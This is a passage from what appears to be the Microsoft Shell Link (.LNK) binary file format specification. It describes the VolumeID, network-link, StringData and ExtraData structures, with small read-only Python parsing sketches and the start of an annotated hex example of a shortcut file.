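    base_off, = struct.unpack_from("<I", link_info, 16)    # LocalBasePathOffset
    suffix_off, = struct.unpack_from("<I", link_info, 24)  # CommonPathSuffixOffset
    return read_cstr(link_info, base_off) + read_cstr(link_info, suffix_off)
```

Both offsets are measured from the start of the LinkInfo structure itself, which is why the sketch indexes into the whole blob rather than into the data area after the header.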
0 1 2 3 4 5 6 7 8 9 1 0 1 2 3 4 5 6 7 8 9 2 0 1 2 3 4 5 6 7 8 9 3 0 1 VolumeIDSize DriveType DriveSerialNumber VolumeLabelOffset 22 / 52 [MS-SHLLINK] — v20100601 Shell Link (.LNK) Binary File Format Copyright © 2010 Microsoft Corporation. Release: Tuesday, June 1, 2010 VolumeLabelOffsetUnicode (optional) Data (variable) ... VolumeIDSize (4 bytes): A 32-bit, unsigned integer that specifies the size, in bytes, of this structure. This value MUST be greater than 0x00000010. All offsets specified in this structure MUST be less than this value, and all strings contained in this structure MUST fit within t he extent defined by this size. DriveType (4 bytes): A 32-bit, unsigned integer that specifies the type of drive the link target is stored on. This value MUST be one of the following: Value Meaning DRIVE_UNKNOWN 0x00000000 The drive type cannot be determined. DRIVE_NO_ROOT_DIR 0x00000001 The root path is invalid; for example, there is no volume mounted at the path. DRIVE_REMOVABLE 0x00000002 The drive has removable media, such as a floppy drive, thumb drive, or flash card reader. DRIVE_FIXED 0x00000003 The drive has fixed media, such as a hard drive or flash drive. DRIVE_REMOTE 0x00000004 The drive is a remote (network) drive. DRIVE_CDROM 0x00000005 The drive is a CD -ROM drive. DRIVE_RAMDISK 0x00000006 The drive is a RAM disk. DriveSerialNumber (4 bytes): A 32-bit, unsigned integer that specifies the drive serial number of the volume the link target is stored on. VolumeLabelOffset (4 bytes): A 32-bit, unsigned integer that specifies the location of a string that contains the volume label of the drive that the link target is stored on. This value is an offset, in bytes, from the start of the VolumeID structure to a NULL-terminated string of characters, defined by the system default code page. The volume label string is located in the Data field of this structure. 
If the value of this field is 0x00000014, it MUST be ignored, and the value of the VolumeLabelOffsetUnicode field MUST be used to locate the volume label string.

VolumeLabelOffsetUnicode (4 bytes): An optional, 32-bit, unsigned integer that specifies the location of a string that contains the volume label of the drive that the link target is stored on. This value is an offset, in bytes, from the start of the VolumeID structure to a NULL-terminated string of Unicode characters. The volume label string is located in the Data field of this structure. If the value of the VolumeLabelOffset field is not 0x00000014, this field MUST be ignored, and the value of the VolumeLabelOffset field MUST be used to locate the volume label string.

Data (variable): A buffer of data that contains the volume label of the drive as a string defined by the system default code page or Unicode characters, as specified by preceding fields.

2.3.2 CommonNetworkRelativeLink

The CommonNetworkRelativeLink structure specifies information about the network location where a link target is stored, including the mapped drive letter and the UNC path prefix. For details on UNC paths, see [MS-DFSNM] section 2.2.1.4.

Layout: CommonNetworkRelativeLinkSize, CommonNetworkRelativeLinkFlags, NetNameOffset, DeviceNameOffset, NetworkProviderType, NetNameOffsetUnicode (optional), DeviceNameOffsetUnicode (optional), NetName (variable), DeviceName (variable), NetNameUnicode (variable), DeviceNameUnicode (variable).

CommonNetworkRelativeLinkSize (4 bytes): A 32-bit, unsigned integer that specifies the size, in bytes, of the CommonNetworkRelativeLink structure.
This value MUST be greater than or equal to 0x00000014. All offsets specified in this structure MUST be less than this value, and all strings contained in this structure MUST fit within the extent defined by this size.

CommonNetworkRelativeLinkFlags (4 bytes): Flags that specify the contents of the DeviceNameOffset and NetProviderType fields. Only the bits A and B are defined; all remaining bits MUST be zero. The bits are defined as:

A (ValidDevice): If set, the DeviceNameOffset field contains an offset to the device name. If not set, the DeviceNameOffset field does not contain an offset to the device name, and its value MUST be zero.

B (ValidNetType): If set, the NetProviderType field contains the network provider type. If not set, the NetProviderType field does not contain the network provider type, and its value MUST be zero.

NetNameOffset (4 bytes): A 32-bit, unsigned integer that specifies the location of the NetName field. This value is an offset, in bytes, from the start of the CommonNetworkRelativeLink structure.

DeviceNameOffset (4 bytes): A 32-bit, unsigned integer that specifies the location of the DeviceName field. If the ValidDevice flag is set, this value is an offset, in bytes, from the start of the CommonNetworkRelativeLink structure; otherwise, this value MUST be zero.

NetworkProviderType (4 bytes): A 32-bit, unsigned integer that specifies the type of network provider. If the ValidNetType flag is set, this value MUST be one of the following; otherwise, this value MUST be ignored.

WNNC_NET_AVID 0x001A0000
WNNC_NET_DOCUSPACE 0x001B0000
WNNC_NET_MANGOSOFT 0x001C0000
WNNC_NET_SERNET 0x001D0000
WNNC_NET_RIVERFRONT1 0x001E0000
WNNC_NET_RIVERFRONT2 0x001F0000
WNNC_NET_DECORB 0x00200000
WNNC_NET_PROTSTOR 0x00210000
WNNC_NET_FJ_REDIR 0x00220000
WNNC_NET_DISTINCT 0x00230000
WNNC_NET_TWINS 0x00240000
WNNC_NET_RDR2SAMPLE 0x00250000
WNNC_NET_CSC 0x00260000
WNNC_NET_3IN1 0x00270000
WNNC_NET_EXTENDNET 0x00290000
WNNC_NET_STAC 0x002A0000
WNNC_NET_FOXBAT 0x002B0000
WNNC_NET_YAHOO 0x002C0000
WNNC_NET_EXIFS 0x002D0000
WNNC_NET_DAV 0x002E0000
WNNC_NET_KNOWARE 0x002F0000
WNNC_NET_OBJECT_DIRE 0x00300000
WNNC_NET_MASFAX 0x00310000
WNNC_NET_HOB_NFS 0x00320000
WNNC_NET_SHIVA 0x00330000
WNNC_NET_IBMAL 0x00340000
WNNC_NET_LOCK 0x00350000
WNNC_NET_TERMSRV 0x00360000
WNNC_NET_SRT 0x00370000
WNNC_NET_QUINCY 0x00380000
WNNC_NET_OPENAFS 0x00390000
WNNC_NET_AVID1 0x003A0000
WNNC_NET_DFS 0x003B0000
WNNC_NET_KWNP 0x003C0000
WNNC_NET_ZENWORKS 0x003D0000
WNNC_NET_DRIVEONWEB 0x003E0000
WNNC_NET_VMWARE 0x003F0000
WNNC_NET_RSFX 0x00400000
WNNC_NET_MFILES 0x00410000
WNNC_NET_MS_NFS 0x00420000
WNNC_NET_GOOGLE 0x00430000

NetNameOffsetUnicode (4 bytes): An optional, 32-bit, unsigned integer that specifies the location of the NetNameUnicode field. This value is an offset, in bytes, from the start of the CommonNetworkRelativeLink structure. This field MUST be present if the value of the NetNameOffset field is greater than 0x00000014; otherwise, this field MUST NOT be present.

DeviceNameOffsetUnicode (4 bytes): An optional, 32-bit, unsigned integer that specifies the location of the DeviceNameUnicode field. This value is an offset, in bytes, from the start of the CommonNetworkRelativeLink structure. This field MUST be present if the value of the NetNameOffset field is greater than 0x00000014; otherwise, this field MUST NOT be present.
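The fixed-size offset fields above are what locate the variable-length strings that follow them. A minimal parsing sketch, not part of the specification itself; it assumes ANSI-only strings, uses cp1252 as a stand-in for the system default code page, and treats ValidDevice as the low-order flag bit (0x1), as in common implementations:

```python
import struct

def read_common_network_relative_link(data: bytes) -> dict:
    """Sketch: resolve the NetName/DeviceName strings through the offset
    fields of a CommonNetworkRelativeLink ([MS-SHLLINK] 2.3.2).
    Assumptions: ANSI-only strings, cp1252 standing in for the system
    default code page, ValidDevice as flag bit 0x1."""
    size, flags, net_off, dev_off, _net_provider = struct.unpack_from("<5I", data, 0)
    if size < 0x14:
        raise ValueError("CommonNetworkRelativeLinkSize MUST be >= 0x00000014")

    def cstr(off: int) -> str:
        # Strings are NULL-terminated and must lie within the structure.
        end = data.index(b"\x00", off)
        return data[off:end].decode("cp1252")

    result = {"net_name": cstr(net_off)}
    if flags & 0x1:  # ValidDevice: DeviceNameOffset is meaningful
        result["device_name"] = cstr(dev_off)
    return result
```

The Unicode variants would be read the same way through NetNameOffsetUnicode and DeviceNameOffsetUnicode when NetNameOffset is greater than 0x00000014.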
NetName (variable): A NULL-terminated string, as defined by the system default code page, which specifies a server share path; for example, "\\server\share".

DeviceName (variable): A NULL-terminated string, as defined by the system default code page, which specifies a device; for example, the drive letter "D:".

NetNameUnicode (variable): An optional, NULL-terminated, Unicode string that is the Unicode version of the NetName string. This field MUST be present if the value of the NetNameOffset field is greater than 0x00000014; otherwise, this field MUST NOT be present.

DeviceNameUnicode (variable): An optional, NULL-terminated, Unicode string that is the Unicode version of the DeviceName string. This field MUST be present if the value of the NetNameOffset field is greater than 0x00000014; otherwise, this field MUST NOT be present.

2.4 StringData

StringData refers to a set of structures that convey user interface and path identification information. The presence of these optional structures is controlled by LinkFlags (section 2.1.1) in the ShellLinkHeader (section 2.1). The StringData structures conform to the following ABNF rules [RFC5234].

STRING_DATA = [NAME_STRING] [RELATIVE_PATH] [WORKING_DIR] [COMMAND_LINE_ARGUMENTS] [ICON_LOCATION]

NAME_STRING: An optional structure that specifies a description of the shortcut that is displayed to end users to identify the purpose of the shell link. This structure MUST be present if the HasName flag is set.

RELATIVE_PATH: An optional structure that specifies the location of the link target relative to the file that contains the shell link. When specified, this string SHOULD be used when resolving the link. This structure MUST be present if the HasRelativePath flag is set.
WORKING_DIR: An optional structure that specifies the file system path of the working directory to be used when activating the link target. This structure MUST be present if the HasWorkingDir flag is set.

COMMAND_LINE_ARGUMENTS: An optional structure that stores the command-line arguments that should be specified when activating the link target. This structure MUST be present if the HasArguments flag is set.

ICON_LOCATION: An optional structure that specifies the location of the icon to be used when displaying a shell link item in an icon view. This structure MUST be present if the HasIconLocation flag is set.

All StringData structures have the following layout: CountCharacters (2 bytes), String (variable).

CountCharacters (2 bytes): A 16-bit, unsigned integer that specifies either the number of characters, defined by the system default code page, or the number of Unicode characters found in the String field. A value of zero specifies an empty string.

String (variable): An optional set of characters, defined by the system default code page, or a Unicode string with a length specified by the CountCharacters field. This string MUST NOT be NULL-terminated.

2.5 ExtraData

ExtraData refers to a set of structures that convey additional information about a link target. These optional structures can be present in an extra data section that is appended to the basic Shell Link Binary File Format. The ExtraData structures conform to the following ABNF rules [RFC5234]:

EXTRA_DATA = *EXTRA_DATA_BLOCK TERMINAL_BLOCK
EXTRA_DATA_BLOCK = CONSOLE_PROPS / CONSOLE_FE_PROPS / DARWIN_PROPS / ENVIRONMENT_PROPS / ICON_ENVIRONMENT_PROPS / KNOWN_FOLDER_PROPS / PROPERTY_STORE_PROPS /
SHIM_PROPS / SPECIAL_FOLDER_PROPS / TRACKER_PROPS / VISTA_AND_ABOVE_IDLIST_PROPS

EXTRA_DATA: A structure consisting of zero or more property data blocks followed by a terminal block.

EXTRA_DATA_BLOCK: A structure consisting of any one of the following property data blocks.

CONSOLE_PROPS: A ConsoleDataBlock structure (section 2.5.1).
CONSOLE_FE_PROPS: A ConsoleFEDataBlock structure (section 2.5.2).
DARWIN_PROPS: A DarwinDataBlock structure (section 2.5.3).
ENVIRONMENT_PROPS: An EnvironmentVariableDataBlock structure (section 2.5.4).
ICON_ENVIRONMENT_PROPS: An IconEnvironmentDataBlock structure (section 2.5.5).
KNOWN_FOLDER_PROPS: A KnownFolderDataBlock structure (section 2.5.6).
PROPERTY_STORE_PROPS: A PropertyStoreDataBlock structure (section 2.5.7).
SHIM_PROPS: A ShimDataBlock structure (section 2.5.8).
SPECIAL_FOLDER_PROPS: A SpecialFolderDataBlock structure (section 2.5.9).
TRACKER_PROPS: A TrackerDataBlock structure (section 2.5.10).
VISTA_AND_ABOVE_IDLIST_PROPS: A VistaAndAboveIDListDataBlock structure (section 2.5.11).
TERMINAL_BLOCK: A structure that indicates the end of the extra data section.

The general structure of an extra data section is: ExtraDataBlock (variable), followed by TerminalBlock.

ExtraDataBlock (variable): An optional array of bytes that contains zero or more property data blocks listed in the EXTRA_DATA_BLOCK syntax rule.

TerminalBlock (4 bytes): A 32-bit, unsigned integer that indicates the end of the extra data section. This value MUST be less than 0x00000004.

2.5.1 ConsoleDataBlock

The ConsoleDataBlock structure specifies the display settings to use when a link target specifies an application that is run in a console window.
<2>

Layout: BlockSize, BlockSignature, FillAttributes (2 bytes), PopupFillAttributes (2 bytes), ScreenBufferSizeX, ScreenBufferSizeY, WindowSizeX, WindowSizeY, WindowOriginX, WindowOriginY (2 bytes each), Unused1, Unused2, FontSize, FontFamily, FontWeight, FaceName (64 bytes), CursorSize, FullScreen, InsertMode, AutoPosition, HistoryBufferSize, NumberOfHistoryBuffers, HistoryNoDup, ColorTable (64 bytes).

BlockSize (4 bytes): A 32-bit, unsigned integer that specifies the size of the ConsoleDataBlock structure. This value MUST be 0x000000CC.

BlockSignature (4 bytes): A 32-bit, unsigned integer that specifies the signature of the ConsoleDataBlock extra data section. This value MUST be 0xA0000002.

FillAttributes (2 bytes): A 16-bit, unsigned integer that specifies the fill attributes that control the foreground and background text colors in the console window. The following bit definitions can be combined to specify 16 different values each for the foreground and background colors:

FOREGROUND_BLUE (0x0001): The foreground text color contains blue.
FOREGROUND_GREEN (0x0002): The foreground text color contains green.
FOREGROUND_RED (0x0004): The foreground text color contains red.
FOREGROUND_INTENSITY (0x0008): The foreground text color is intensified.
BACKGROUND_BLUE (0x0010): The background text color contains blue.
BACKGROUND_GREEN (0x0020): The background text color contains green.
BACKGROUND_RED (0x0040): The background text color contains red.
BACKGROUND_INTENSITY (0x0080): The background text color is intensified.
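Since the foreground bits occupy the low nibble and the background bits the next nibble, a FillAttributes value splits into two 4-bit indexes. A small illustrative helper (the function name is an assumption, not from the specification):

```python
def fill_attribute_indexes(fill_attributes: int) -> tuple[int, int]:
    """Sketch: split a FillAttributes value into (foreground, background)
    4-bit indexes. Each index combines the BLUE/GREEN/RED/INTENSITY bits
    and can be used to index the 16-entry ColorTable described later in
    this section."""
    foreground = fill_attributes & 0x000F
    background = (fill_attributes >> 4) & 0x000F
    return foreground, background
```

For example, FOREGROUND_GREEN | FOREGROUND_RED | BACKGROUND_BLUE (0x0016) yields foreground index 6 and background index 1.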
PopupFillAttributes (2 bytes): A 16-bit, unsigned integer that specifies the fill attributes that control the foreground and background text color in the console window popup. The values are the same as for the FillAttributes field.

ScreenBufferSizeX (2 bytes): A 16-bit, signed integer that specifies the horizontal size (X axis), in characters, of the console window buffer.

ScreenBufferSizeY (2 bytes): A 16-bit, signed integer that specifies the vertical size (Y axis), in characters, of the console window buffer.

WindowSizeX (2 bytes): A 16-bit, signed integer that specifies the horizontal size (X axis), in characters, of the console window.

WindowSizeY (2 bytes): A 16-bit, signed integer that specifies the vertical size (Y axis), in characters, of the console window.

WindowOriginX (2 bytes): A 16-bit, signed integer that specifies the horizontal coordinate (X axis), in pixels, of the console window origin.

WindowOriginY (2 bytes): A 16-bit, signed integer that specifies the vertical coordinate (Y axis), in pixels, of the console window origin.

Unused1 (4 bytes): A value that is undefined and MUST be ignored.

Unused2 (4 bytes): A value that is undefined and MUST be ignored.

FontSize (4 bytes): A 32-bit, unsigned integer that specifies the size, in pixels, of the font used in the console window.

FontFamily (4 bytes): A 32-bit, unsigned integer that specifies the family of the font used in the console window. This value MUST be one of the following:

FF_DONTCARE (0x0000): The font family is unknown.
FF_ROMAN (0x0010): The font is variable-width with serifs; for example, "Times New Roman".
FF_SWISS (0x0020): The font is variable-width without serifs; for example, "Arial".
FF_MODERN (0x0030): The font is fixed-width, with or without serifs; for example, "Courier New".
FF_SCRIPT (0x0040): The font is designed to look like handwriting; for example, "Cursive".
FF_DECORATIVE (0x0050): The font is a novelty font; for example, "Old English".

FontWeight (4 bytes): A 32-bit, unsigned integer that specifies the stroke weight of the font used in the console window. A value of 700 or greater specifies a bold font; a value less than 700 specifies a regular-weight font.

FaceName (64 bytes): A 32-character Unicode string that specifies the face name of the font used in the console window.

CursorSize (4 bytes): A 32-bit, unsigned integer that specifies the size of the cursor, in pixels, used in the console window. A value of 25 or less specifies a small cursor; 26 through 50, a medium cursor; 51 through 100, a large cursor.

FullScreen (4 bytes): A 32-bit, unsigned integer that specifies whether to open the console window in full-screen mode. A value of 0x00000000 means full-screen mode is off; any nonzero value means full-screen mode is on.

InsertMode (4 bytes): A 32-bit, unsigned integer that specifies insert mode in the console window. A value of 0x00000000 means insert mode is disabled; any nonzero value means insert mode is enabled.

AutoPosition (4 bytes): A 32-bit, unsigned integer that specifies the auto-position mode of the console window. If the value is 0x00000000, the values of the WindowOriginX and WindowOriginY fields are used to position the console window; any nonzero value means the console window is positioned automatically.

HistoryBufferSize (4 bytes): A 32-bit, unsigned integer that specifies the size, in characters, of the buffer that is used to store a history of user input into the console window.

NumberOfHistoryBuffers (4 bytes): A 32-bit, unsigned integer that specifies the number of history buffers to use.

HistoryNoDup (4 bytes): A 32-bit, unsigned integer that specifies whether to remove duplicates in the history buffer.
A value of 0x00000000 specifies that duplicates are not allowed; any nonzero value specifies that duplicates are allowed.

ColorTable (64 bytes): A table of 16 32-bit, unsigned integers specifying the RGB colors that are used for text in the console window. The values of the fill attribute fields FillAttributes and PopupFillAttributes are used as indexes into this table to specify the final foreground and background color for a character.

2.5.2 ConsoleFEDataBlock

The ConsoleFEDataBlock structure specifies the code page to use for displaying text when a link target specifies an application that is run in a console window. <3>

Layout: BlockSize, BlockSignature, CodePage.

BlockSize (4 bytes): A 32-bit, unsigned integer that specifies the size of the ConsoleFEDataBlock structure. This value MUST be 0x0000000C.

BlockSignature (4 bytes): A 32-bit, unsigned integer that specifies the signature of the ConsoleFEDataBlock extra data section. This value MUST be 0xA0000004.

CodePage (4 bytes): A 32-bit, unsigned integer that specifies a code page language code identifier. For details concerning the structure and meaning of language code identifiers, see [MS-LCID]. For additional background information, see [MSCHARSET] and [MSDN-CODEPAGE].

2.5.3 DarwinDataBlock

The DarwinDataBlock structure specifies an application identifier that can be used instead of a link target IDList to install an application when a shell link is activated.

Layout: BlockSize, BlockSignature, DarwinDataAnsi (260 bytes), DarwinDataUnicode (520 bytes, optional).
BlockSize (4 bytes): A 32-bit, unsigned integer that specifies the size of the DarwinDataBlock structure. This value MUST be 0x00000314.

BlockSignature (4 bytes): A 32-bit, unsigned integer that specifies the signature of the DarwinDataBlock extra data section. This value MUST be 0xA0000006.

DarwinDataAnsi (260 bytes): A NULL-terminated string, defined by the system default code page, which specifies an application identifier. This field SHOULD be ignored.

DarwinDataUnicode (520 bytes): An optional, NULL-terminated, Unicode string that specifies an application identifier. <4>

2.5.4 EnvironmentVariableDataBlock

The EnvironmentVariableDataBlock structure specifies a path to environment variable information when the link target refers to a location that has a corresponding environment variable.

Layout: BlockSize, BlockSignature, TargetAnsi (260 bytes), TargetUnicode (520 bytes).

BlockSize (4 bytes): A 32-bit, unsigned integer that specifies the size of the EnvironmentVariableDataBlock structure. This value MUST be 0x00000314.

BlockSignature (4 bytes): A 32-bit, unsigned integer that specifies the signature of the EnvironmentVariableDataBlock extra data section. This value MUST be 0xA0000001.

TargetAnsi (260 bytes): A NULL-terminated string, defined by the system default code page, which specifies a path to environment variable information.

TargetUnicode (520 bytes): An optional, NULL-terminated, Unicode string that specifies a path to environment variable information.
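Because BlockSize is fixed at 0x00000314, the TargetAnsi and TargetUnicode fields sit at fixed offsets (8 and 268), which makes this block straightforward to read. A hedged sketch (the helper name is illustrative; cp1252 is assumed as a stand-in for the system default code page):

```python
import struct

ENV_PROPS_SIG = 0xA0000001  # EnvironmentVariableDataBlock signature

def parse_environment_block(block: bytes) -> str:
    """Sketch: extract the target path from an EnvironmentVariableDataBlock
    ([MS-SHLLINK] 2.5.4). Prefers the Unicode copy when it is non-empty,
    falling back to the code-page string."""
    size, sig = struct.unpack_from("<2I", block, 0)
    if size != 0x314 or sig != ENV_PROPS_SIG:
        raise ValueError("not an EnvironmentVariableDataBlock")
    ansi = block[8:8 + 260]          # TargetAnsi, fixed 260 bytes
    uni = block[8 + 260:8 + 260 + 520]  # TargetUnicode, fixed 520 bytes
    target = uni.decode("utf-16-le", "ignore").split("\x00")[0]
    if not target:
        target = ansi.split(b"\x00")[0].decode("cp1252", "replace")
    return target
```

The IconEnvironmentDataBlock in the next section has the same shape and could be parsed identically, with 0xA0000007 as the expected signature.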
2.5.5 IconEnvironmentDataBlock

The IconEnvironmentDataBlock structure specifies the path to an icon. The path is encoded using environment variables, which makes it possible to find the icon across machines where the locations vary but are expressed using environment variables.

Layout: BlockSize, BlockSignature, TargetAnsi (260 bytes), TargetUnicode (520 bytes).

BlockSize (4 bytes): A 32-bit, unsigned integer that specifies the size of the IconEnvironmentDataBlock structure. This value MUST be 0x00000314.

BlockSignature (4 bytes): A 32-bit, unsigned integer that specifies the signature of the IconEnvironmentDataBlock extra data section. This value MUST be 0xA0000007.

TargetAnsi (260 bytes): A NULL-terminated string, defined by the system default code page, which specifies a path that is constructed with environment variables.

TargetUnicode (520 bytes): An optional, NULL-terminated, Unicode string that specifies a path that is constructed with environment variables.

2.5.6 KnownFolderDataBlock

The KnownFolderDataBlock structure specifies the location of a known folder. This data can be used when a link target is a known folder to keep track of the folder so that the link target IDList can be translated when the link is loaded.

Layout: BlockSize, BlockSignature, KnownFolderID (16 bytes), Offset.

BlockSize (4 bytes): A 32-bit, unsigned integer that specifies the size of the KnownFolderDataBlock structure. This value MUST be 0x0000001C.
BlockSignature (4 bytes): A 32-bit, unsigned integer that specifies the signature of the KnownFolderDataBlock extra data section. This value MUST be 0xA000000B.

KnownFolderID (16 bytes): A GUID that specifies the folder GUID ID.

Offset (4 bytes): A 32-bit, unsigned integer that specifies the location of the ItemID of the first child segment of the IDList specified by KnownFolderID. This value is the offset, in bytes, into the link target IDList.

2.5.7 PropertyStoreDataBlock

A PropertyStoreDataBlock structure specifies a set of properties that can be used by applications to store extra data in the shell link.

Layout: BlockSize, BlockSignature, PropertyStore (variable).

BlockSize (4 bytes): A 32-bit, unsigned integer that specifies the size of the PropertyStoreDataBlock structure. This value MUST be greater than or equal to 0x0000000C.

BlockSignature (4 bytes): A 32-bit, unsigned integer that specifies the signature of the PropertyStoreDataBlock extra data section. This value MUST be 0xA0000009.

PropertyStore (variable): A serialized property storage structure ([MS-PROPSTORE] section 2.2).

2.5.8 ShimDataBlock

The ShimDataBlock structure specifies the name of a shim that can be applied when activating a link target.

Layout: BlockSize, BlockSignature, LayerName (variable).

BlockSize (4 bytes): A 32-bit, unsigned integer that specifies the size of the ShimDataBlock structure. This value MUST be greater than or equal to 0x00000088.

BlockSignature (4 bytes): A 32-bit, unsigned integer that specifies the signature of the ShimDataBlock extra data section. This value MUST be 0xA0000008.
LayerName (variable): A Unicode string that specifies the name of a shim layer to apply to a link target when it is being activated.

2.5.9 SpecialFolderDataBlock

The SpecialFolderDataBlock structure specifies the location of a special folder. This data can be used when a link target is a special folder to keep track of the folder, so that the link target IDList can be translated when the link is loaded.

Layout: BlockSize, BlockSignature, SpecialFolderID, Offset.

BlockSize (4 bytes): A 32-bit, unsigned integer that specifies the size of the SpecialFolderDataBlock structure. This value MUST be 0x00000010.

BlockSignature (4 bytes): A 32-bit, unsigned integer that specifies the signature of the SpecialFolderDataBlock extra data section. This value MUST be 0xA0000005.

SpecialFolderID (4 bytes): A 32-bit, unsigned integer that specifies the folder integer ID.

Offset (4 bytes): A 32-bit, unsigned integer that specifies the location of the ItemID of the first child segment of the IDList specified by SpecialFolderID. This value is the offset, in bytes, into the link target IDList.

2.5.10 TrackerDataBlock

The TrackerDataBlock structure specifies data that can be used to resolve a link target if it is not found in its original location when the link is resolved. This data is passed to the Link Tracking service [MS-DLTW] to find the link target.

Layout: BlockSize, BlockSignature, Length, Version, MachineID (variable), Droid (32 bytes), DroidBirth (32 bytes).
BlockSize (4 bytes): A 32-bit, unsigned integer that specifies the size of the TrackerDataBlock structure. This value MUST be 0x00000060.

BlockSignature (4 bytes): A 32-bit, unsigned integer that specifies the signature of the TrackerDataBlock extra data section. This value MUST be 0xA0000003.

Length (4 bytes): A 32-bit, unsigned integer. This value MUST be greater than or equal to 0x00000058.

Version (4 bytes): A 32-bit, unsigned integer. This value MUST be 0x00000000.

MachineID (variable): A character string, as defined by the system default code page, which specifies the NetBIOS name of the machine where the link target was last known to reside.

Droid (32 bytes): Two GUID values that are used to find the link target with the Link Tracking service, as specified in [MS-DLTW].

DroidBirth (32 bytes): Two GUID values that are used to find the link target with the Link Tracking service, as specified in [MS-DLTW].

2.5.11 VistaAndAboveIDListDataBlock

The VistaAndAboveIDListDataBlock structure specifies an alternate IDList that can be used instead of the LinkTargetIDList structure (section 2.2) on platforms that support it. <5>

Layout: BlockSize, BlockSignature, IDList (variable).

BlockSize (4 bytes): A 32-bit, unsigned integer that specifies the size of the VistaAndAboveIDListDataBlock structure. This value MUST be greater than or equal to 0x0000000A.

BlockSignature (4 bytes): A 32-bit, unsigned integer that specifies the signature of the VistaAndAboveIDListDataBlock extra data section. This value MUST be 0xA000000C.

IDList (variable): An IDList structure (section 2.2.1).
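The TERMINAL_BLOCK rule from section 2.5 gives a simple loop for walking an extra data section: read a 4-byte BlockSize, stop when it is less than 0x00000004, otherwise dispatch on the 4-byte BlockSignature that follows it. A sketch (the generator name is an assumed helper, not from the specification):

```python
import struct

def iter_extra_data_blocks(extra: bytes):
    """Sketch: walk an ExtraData section ([MS-SHLLINK] 2.5), yielding
    (BlockSignature, block bytes) until the TerminalBlock is reached."""
    off = 0
    while off + 4 <= len(extra):
        (block_size,) = struct.unpack_from("<I", extra, off)
        if block_size < 0x00000004:  # TerminalBlock: end of the section
            break
        (signature,) = struct.unpack_from("<I", extra, off + 4)
        yield signature, extra[off:off + block_size]
        off += block_size
```

A caller would then match each signature against the block signatures listed above (0xA0000002 for ConsoleDataBlock, 0xA0000003 for TrackerDataBlock, and so on) and skip blocks it does not recognize.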
3 Structure Examples

3.1 Shortcut to a File

This section presents a sample of the Shell Link Binary File Format, consisting of a shortcut to a file with the path "C:\test\a.txt". The following is the hexadecimal representation of the contents of the shell link.

     x0 x1 x2 x3 x4 x5 x6 x7 x8 x9 xA xB xC xD xE xF
0000 4C 00 00 00 01 14 02 00 00 00 00 00 C0 00 00 00
0010 00 00 00 46 9B 00 08 00 20 00 00 00 D0 E9 EE F2
0020 15 15 C9 01 D0 E9 EE F2 15 15 C9 01 D0 E9 EE F2
0030 15 15 C9 01 00 00 00 00 00 00 00 00 01 00 00 00
0040 00 00 00 00 00 00 00 00 00 00 00 00 BD 00 14 00
0050 1F 50 E0 4F D0 20 EA 3A 69 10 A2 D8 08 00 2B 30
0060 30 9D 19 00 2F 43 3A 5C 00 00 00 00 00 00 00 00
0070 00 00 00 00 00 00 00 00 00 00 00 46 00 31 00 00
0080 00 00 00 2C 39 69 A3 10 00 74 65 73 74 00 00 32
0090 00 07 00 04 00 EF BE 2C 39 65 A3 2C 39 69 A3 26
00A0 00 00 00 03 1E 00 00 00 00 F5 1E 00 00 00 00 00
00B0 00 00 00 00 00 74 00 65 00 73 00 74 00 00 00 14
00C0 00 48 00 32 00 00 00 00 00 2C 39 69 A3 20 00 61
00D0 2E 74 78 74 00 34 00 07 00 04 00 EF BE 2C 39 69
00E0 A3 2C 39 69 A3 26 00 00 00 2D 6E 00 00 00 00 96
00F0 01 00 00 00 00 00 00 00 00 00 00 61 00 2E 00 74
0100 00 78 00 74 00 00 00 14 00 00 00 3C 00 00 00 1C
0110 00 00 00 01 00 00 00 1C 00 00 00 2D 00 00 00 00
0120 00 00 00 3B 00 00 00 11 00 00 00 03 00 00 00 81
0130 8A 7A 30 10 00 00 00 00 43 3A 5C 74 65 73 74 5C
0140 61 2E 74 78 74 00 00 07 00 2E 00 5C 00 61 00 2E
0150 00 74 00 78 00 74 00 07 00 43 00 3A 00 5C 00 74
0160 00 65 00 73 00 74 00 60 00 00 00 03 00 00 A0 58
0170 00 00 00 00 00 00 00 63 68 72 69 73 2D 78 70 73
0180 00 00 00 00 00 00 00 40 78 C7 94 47 FA C7 46 B3
0190 56 5C 2D C6 B6 D1 15 EC 46 CD 7B 22 7F DD 11 94
01A0 99 00 13 72 16 87 4A 40 78 C7 94 47 FA C7 46 B3
01B0 56 5C 2D C6 B6 D1 15 EC 46 CD 7B 22 7F DD 11 94
01C0 99 00 13 72 16 87 4A 00 00 00 00

HeaderSize: (4 bytes, offset 0x0000), 0x0000004C, as required.

LinkCLSID: (16 bytes, offset 0x0004), 00021401-0000-0000-C000-000000000046.

LinkFlags: (4 bytes, offset 0x0014), 0x0008009B, which means the following LinkFlags (section 2.1.1) are set: HasLinkTargetIDList, HasLinkInfo, HasRelativePath, HasWorkingDir, IsUnicode, EnableTargetMetadata.

FileAttributes: (4 bytes, offset 0x0018), 0x00000020, which means the following FileAttributesFlags (section 2.1.2) are set: FILE_ATTRIBUTE_ARCHIVE.

CreationTime: (8 bytes, offset 0x001C), FILETIME 9/12/08, 8:27:17 PM.

AccessTime: (8 bytes, offset 0x0024), FILETIME 9/12/08, 8:27:17 PM.

WriteTime: (8 bytes, offset 0x002C), FILETIME 9/12/08, 8:27:17 PM.

FileSize: (4 bytes, offset 0x0034), 0x00000000.

IconIndex: (4 bytes, offset 0x0038), 0x00000000.

ShowCommand: (4 bytes, offset 0x003C), SW_SHOWNORMAL(1).

Hotkey: (2 bytes, offset 0x0040), 0x0000.

Reserved: (2 bytes, offset 0x0042), 0x0000.

Reserved2: (4 bytes, offset 0x0044), 0x00000000.

Reserved3: (4 bytes, offset 0x0048), 0x00000000.

Because HasLinkTargetIDList is set, a LinkTargetIDList structure (section 2.2) follows:

IDListSize: (2 bytes, offset 0x004C), 0x00BD, the size of IDList.
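The fixed header fields just enumerated can be unpacked directly with Python's struct module. A sketch (offsets as listed in the walkthrough; the function name and returned dictionary are illustrative, not part of the format):

```python
import struct

def parse_header(data: bytes) -> dict:
    """Sketch: unpack a few fixed ShellLinkHeader fields at the offsets
    given in the walkthrough above. Assumed helper, not normative."""
    (header_size,) = struct.unpack_from("<I", data, 0x00)
    if header_size != 0x4C:
        raise ValueError("HeaderSize MUST be 0x0000004C")
    link_flags, file_attributes = struct.unpack_from("<2I", data, 0x14)
    file_size, icon_index, show_command = struct.unpack_from("<IiI", data, 0x34)
    return {
        "link_flags": link_flags,
        "file_attributes": file_attributes,
        "file_size": file_size,
        "icon_index": icon_index,
        "show_command": show_command,
        # Two of the LinkFlags bits named above:
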